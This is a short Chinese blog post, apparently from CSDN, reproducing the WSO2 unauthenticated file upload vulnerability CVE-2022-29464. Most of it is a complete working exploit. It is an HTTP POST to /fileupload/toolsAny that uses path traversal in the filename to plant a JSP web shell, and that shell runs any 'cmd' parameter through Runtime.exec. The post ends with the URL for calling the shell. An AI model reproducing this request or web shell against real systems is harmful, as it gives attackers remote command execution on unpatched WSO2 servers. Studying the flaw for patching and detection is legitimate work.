CVE-2022-29464漏洞复现

最新推荐文章于 2024-07-02 19:15:18 发布

weixin_45177807

最新推荐文章于 2024-07-02 19:15:18 发布

阅读量976

点赞数

文章标签：服务器网络运维安全

本文链接：https://blog.csdn.net/weixin_45177807/article/details/127696478

版权

WSO2文件上传漏洞（CVE-2022-29464）是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

1.访问WSO2 https://ip:port/carbon/admin/login.jsp

2.抓包然后构造请求包，返回数字即为上传成功。

poc如下：

POST /fileupload/toolsAny HTTP/2
Host: xxx:80
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 889
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--

3.上传成功之后访问ip:port/authenticationendpoint/1.jsp即可执行命令。